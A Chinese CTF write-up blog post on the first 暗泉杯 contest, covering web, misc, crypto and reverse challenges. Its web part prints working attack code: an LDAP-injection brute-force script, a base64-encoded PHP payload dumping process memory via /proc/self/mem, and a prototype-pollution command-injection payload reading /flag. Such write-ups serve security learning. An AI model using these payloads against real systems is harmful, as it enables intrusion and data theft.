第一届暗泉杯web wp(包括复现),以及部分签到题

已于 2022-01-20 10:24:36 修改
阅读量3.4k 收藏 3
点赞数 3
分类专栏: ctf-wp 文章标签: 安全
于 2021-12-08 17:47:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57674981/article/details/121796369
版权

总分2108,排行57,还是太水了,记录一下叭

目录

   web   

签到题:

[萌]odd_upload

easyinject

hideandseek(复现)

dirtyrce(复现)

   杂项   

签到

   [萌新]在哪呢   

  密码学   

[签到]键盘侠

[萌新]素数

  逆向  

[签到]signin

   web   

签到题:

 直接手拼出来,提交后发现不对,base64在解密一下就过了

[萌]odd_upload

题目描述:目录结构与官方项目example相同

打开靶机发现Smarty模板引擎,去官网下载down下来后看了一下目录结构以及文件后缀。

 

上传文件,抓包改包覆盖index.tpl文件,写入执行的命令,

查看首页就可以得到flag啦

easyinject

打开靶机,构造url报错,发现是ldap注入。根据提示说flag是一位用户的用户名或者邮箱。

直接贴脚本,写的不是很完整,但大概是那个意思,懒得完善了

手动提取一下user,然后一个一个提交了就行

import requests
url = "http://47.106.172.144:2333/?pass=EC77k8RHquAMLKAX&"
username=[]
c = 1
d = 0
dist=['a','b','c','d','e','f','g','h','i','j','k','-','l','m','n','o','p','q','r','.','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0','_','@']
def bpuser(payload):
    username = []
    for i in dist:
        payolad = url + payload +"%s*" %i
        print(payolad)
        str_get = requests.get(url=payolad).text
        if '找不到用户' in str_get:
            continue
        aaa=payload + i
        username.append(bpuser(aaa))
    return username

aaa = "user=l"
user = bpuser(aaa)
print(user)

hideandseek(复现)

这题不会,是后来大佬给了思路复现的,以下的payload是大佬写的。自己写的没那么好

给了两个提示:

        hint1:要怎样才能读到内存里面的flag呢? 注:与PHP版本无关

        hint2:linuxの奇妙文件系统

这一题需要先连接linux下/proc下的文件各个代表的含义

值得一提的是,直接读mem文件时读不了的,需要设置好偏移,至于怎么设置偏移,就得去maps文件中查看偏移量。

payload:

?eval=eval(base64_decode("ICAgICAgICAkaGFuZGxlID0gZm9wZW4oIi9wcm9jL3NlbGYvbWFwcyIsICJyIik7CiAgICAgICAgaWYgKCRoYW5kbGUpIHsKICAgICAgICAgICAgd2hpbGUgKCFmZW9mICgkaGFuZGxlKSkgewogICAgICAgICAgICAgICAgJGJ1ZmZlciA9IGZnZXRzKCRoYW5kbGUpOwogICAgICAgICAgICAgICAgaWYgKHN0cnBvcygkYnVmZmVyLCAnLycpID09PSBmYWxzZSkgewogICAgICAgICAgICAgICAgICAgIC8vIGVjaG8gJGJ1ZmZlcjsKICAgICAgICAgICAgICAgICAgICAkcGF0dGVybiA9ICIvKFthLWYwLTldezEsfSktKFthLWYwLTldezEsfSkvIjsKICAgICAgICAgICAgICAgICAgICBwcmVnX21hdGNoKCRwYXR0ZXJuLCAkYnVmZmVyLCAkbWF0Y2hlcyk7CiAgICAgICAgICAgICAgICAgICAgdmFyX2R1bXAoJG1hdGNoZXMpOyAgLy/ovpPlh7rljLnphY3nu5PmnpwKICAgICAgICAgICAgICAgICAgICAkc3RhcnQgPSBoZXhkZWMoJG1hdGNoZXNbMV0pOwogICAgICAgICAgICAgICAgICAgICRlbmQgPSBoZXhkZWMoJG1hdGNoZXNbMl0pOwogICAgICAgICAgICAgICAgICAgICRzaXplID0gJGVuZC0kc3RhcnQ7CiAgICAgICAgICAgICAgICAgICAgJGNvbnRlbnQgPSBmaWxlX2dldF9jb250ZW50cygiL3Byb2Mvc2VsZi9tZW0iLEZBTFNFLE5VTEwsJHN0YXJ0LCRzaXplKTsKICAgICAgICAgICAgICAgICAgICAvLyBmbGFne30KICAgICAgICAgICAgICAgICAgICAgICAgZWNobyAkY29udGVudDsKICAgICAgICAgICAgICAgICAgICAgICAgZWNobyAiXG4iOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgfQogICAgICAgICAgICBmY2xvc2UgKCRoYW5kbGUpOwogICAgICAgIH0="));

dirtyrce(复现)

此题为复现。因为当时实在没想到原型链污染,这个漏洞点用的还是不熟 

题目描述:RCE IT! flag位置 /flag

hint:代码有一个判断非常奇怪 如何利用这个判断呢 注意题目名称

源码:

var express = require('express');
var nodeCmd = require('node-cmd');
var bodyParser = require('body-parser');
const app = express();
var router = express.Router();
const port = 80;
app.use(bodyParser.urlencoded({
	extended: true
})).use(bodyParser.json());
function isValidIP(ip) {
	var reg = /^(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])\.(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])\.(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])\.(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])$/;
	return reg.test(ip);
}
app.post("/ping",
function(req, res, next) {

	b = req.body.cmd;
	if (req.body.ping === undefined) {
		res.send('invalid parm');
		return;
	}

	ping = req.body.ping

	if (ping.time !== undefined) {
		time = Number(ping.time);
		if (time > 10 || time < 1) {
			res.send('invalid time');
			return;
		}
		if (Object.keys(ping).length != 1 && ping.ip !== undefined && ping.ip != '') {
			if (!isValidIP(ping.ip)) {
				res.send('invalid ip addr');
				return;
			}
		}
	} else {
		res.send('need time parm');
		return;
	}
	ip = ((ping.ip !== undefined && ping.ip != '') ? ping.ip: '114.114.114.114');
	nodeCmd.run('ping -n ' + time + ' ' + ip, //WINDOWS USE -n
	function(err, data, stderr) {
		res.send(data);
		return;
	});

});
app.get('/',
function(req, res, next) {
	res.redirect('index');
});

app.get('/index',
function(req, res, next) {
	res.send('<title>ping test</title><form action="/ping" method="POST">Ip:<input type="text" name="ping[ip]"" placeholder="default value 114 dns"><br>Times:<input type="text" name="ping[time]"  value="1"><input type="submit" value="Ping !"></form> ');
});
app.listen(port);

 问题就出在了这个判断中:

 全部代码中只有它判断了ip,只要我们绕过了这里就能进制rce利用

故此我们不传入ip,只传入time,就能过掉这里所有的阻碍,至于漏洞利用的点,我们可以利用原型链污染,构造这样的payload:ping[__proto__][ip]=;cat /flag&ping[time]=1

 就成功绕过所有的阻碍,成功利用rce

   杂项   

签到

题目直接给了flag,提交就行了

   [萌新]在哪呢   

Pdf文档,ctrl+a,ctrl+c,建个txt文件,粘贴,直接往下滑就看到flag了

  密码学   

[签到]键盘侠

根据给的字母,在键盘上画出来就行了

[萌新]素数

题目要求提交10个1024位的质数,网上搜个脚本,提交了就行

  逆向  

[签到]signin

用ida打开,shift+f12,就看到flag了

foo_L
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第一届暗泉杯 DNUICTF
qq_53263789的博客
02-09 2332
前言 加油!等wp出来再补全博客 flag 签到目 ZmxhZ3tuc3NfbG9naW592 base64 odd_upload smarty模板 目首页知道用到了smarty模板,同时可以上传文件 根据文档 https://www.smarty.net/docs/zh_CN/installing.smarty.basic.tpl 上传路径可控 向 /templates/ 传一个 index.tpl 来控制 index.php显示内容 接下来smarty注入,利用 if 标签 Easy
2021暗泉杯 misc
mumuzi的博客
12-06 1397
拿了一血就得交wp有点太看的起我了,所以不交( Misc range_download 附件挺大,打开之后发现有很多tcp的流只传输了一个字节,根据目名字可知这道是在仿照强网杯的慢传输(Extremelyslow) 利用的是断点续传,强网杯传的是data,而range_download传的是media.type 于是用tshark将其导出 .\tshark.exe -r .\range.pcapng -T fields -e http.response.line -e media.type -Y ht
蓝帽杯2021 One Pointer PHP
Tajang的大千世界
11-23 3701
第一次打FPM/FastCGI的,实际上也是第一次接触打中间件的,刚开始是在陇原战“疫”碰到了一道类似的,也是改编的这道,为了更好地复现这道,理解这道,我去把Fastcgi 协议分析与 PHP-FPM 攻击方法都看了几遍。攻击的实操部分,本来想着复现,但那个鬼环境一直差点意思。这里不得不提中国网安界大神——phith0n,P神开创的vulhub确实帮了国内外网络安全学习者的大忙,让安全研究者更加专注于漏洞原理本身,而不是忙于搭建复杂的漏洞环境。但不幸的事,这个洞的环境坏了,问了P神说官网要下架,让
ctfshow F5杯 部分WP(writeup) 超详细
mumuzi的博客
02-24 4094
本文共4370字,147段落,全文看完预计用时10分钟 这次F5杯的misc难度感觉比大吉杯难了许多,出人的脑洞太大了 在这里感谢各位大师傅群里的随缘hint(水群大胜利) 写的非常详细,可以跟着实际操作,所以最后不会贴上静态flag web       eazy-unserialize &eazy-unserialize-revenge misc       大小二维码 &n
2024第一届帕鲁杯应急响应挑战赛-Writeup
qq_58833765的博客
04-22 2455
直接开始解密发现这是一条付费记录(话不多说直接购买),没办法,只能遍历md5看能不能碰运气,最后发现文件名就是他的md5值的前半段。登录PC02查看到很多非系统用户,除去公司员工用户(中文名),系统用户,判断其余用户可能为恶意用户。通过堡垒机查看webserver会话记录分析,该ip请求繁多,时间段较长,分析可能为攻击ip。直接把附件exe拖到ida分析动态调试,下断点,看验证码,直接把验证改了,基操,ez~通过查看堡垒机会话记录的监控,查看攻击者视角,得出钓鱼文件。
第二届赣网杯WEB第一WP.docx
12-06
【第二届赣网杯WEB第一】是一场网络安全竞赛中的Web挑战赛目,主要涉及CTF(Capture The Flag)领域的知识。此目的核心是通过解决一个连连看游戏来获取隐藏的FLAG,以此来检验参赛者的Web安全技能和逆向工程...
2022年第三届“网鼎杯”网络安全大赛(青龙组)部分目附件
09-19
2022年第三届“网鼎杯”网络安全大赛(青龙组)部分目附件 2022年第三届“网鼎杯”网络安全大赛(青龙组)部分目附件 2022年第三届“网鼎杯”网络安全大赛(青龙组)部分目附件 2022年第三届“网鼎杯”网络...
第一届长城杯 第三赛区 半决赛 AWD 源码
04-23
【描述】"第一届长城杯 第三赛区 半决赛 AWD 源码"的描述进一步证实了这是关于竞赛源代码的分享,没有提供更多的技术细节,但我们可以推测这部分源码可能包含了一些创新的算法或实现,因为它是竞赛的关键部分。...
第一届暗泉杯” 大连东软信息学院网络安全大赛.zip
12-07
CTF 真 暗泉杯 2021
2020 第二届网鼎杯 boom wp
01-20
2020 第二届网鼎杯 boom wp ​ ​ 卑微新手在线答。。。。。 第二届网鼎杯-boom 下载附件得到一个boom.exe程序 打开是这样 根据提示继续 得到一串md5 加密的数据,使用在线解密 https://www.somd5.com/ 得到第...
i-SOON_CTF_2018:2018第一届安洵杯过渡环境源码WP
03-24
AXB-CTF 2018第一届安洵杯过渡环境/原始码
手动实现高仿github的内容diff效果
我本可以容忍阳光,如果我不曾见过太阳,然而阳光已使我荒凉,成为更新的荒凉。
08-16 905
来源:广兰路地铁https://juejin.im/post/6857316059851325453前言最近发现了一个比较好用的内容diff库(就叫diff),非常方便js开发者实现文...
upload()方法
每天进步一点点
07-29 4718
private void upLoad() { // Bitmap bitmap; // Bitmap bmpCompressed; // for (int i = 0; i < list.size() - 1; i++) { // bitmap = BitmapFactory.decodeFile(list.get(i)); //
企业如何保证公司内网安全
shunyou0526的博客
07-25 173
部署防火墙和入侵检测系统:作为内网安全的第一道防线,防火墙和入侵检测系统能够有效阻止外部攻击和恶意软件的入侵。访问控制与身份验证:实施严格的访问控制策略,结合多因素认证(MFA),确保只有授权用户才能访问关键系统和数据。日志管理:建立全面的日志记录和审计机制,对所有数据访问、修改、删除等操作进行记录,以便于追踪和分析。电脑监控软件:使用电脑监控软件来监控员工的屏幕活动、上网行为等,防止内部威胁和不当使用公司资源。反病毒软件与反间谍软件:部署反病毒软件和反间谍软件等恶意软件防护工具,实时监测和清除恶意软件。
极速下载!青苹果系统Win7旗舰版:稳定安全
lihuiyun184291的博客
07-25 184
今天系统之家小编给大家带来了青苹果系统Win7旗舰版镜像,该版本系统离线制作而成,安全无病毒,还升级了防火墙功能,大家安装后时刻都能放心操作。同时,它是在保持原有的功能并适度优化,保留下来的功能轻松满足大家的使用需求,系统稳定性也很高,运作顺畅不卡顿。
2024安全大模型技术与市场研究报告
cybtec的博客
07-25 278
2024安全大模型技术与市场研究报告
一线工作中常用 Shell 脚本: Jar包部署为linux系统服务; 恶意访问,安全防范; SSH 免交互执行命令;
最新发布
iOS逆向与安全
07-25 54
当要使用多个不同的private key登录不同的主机时,我们可以在ssh命令里面用-i参数指定每次使用的private key文件。需求: 通过脚本自动化部署(自动远程登录、远程复制本地资源到服务器,远程执行部署相关命令。之间,remotessh可以随便修改成其他形式的字符串。可以利用~/.ssh/config文件,在让ssh自动为我们决定应该使用哪个key。在文本中搜索指定的内容——grep命令的常用选项。远程执行的命令内容较多,使用脚本方式实现。方法2:通过TCP建立的连接。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值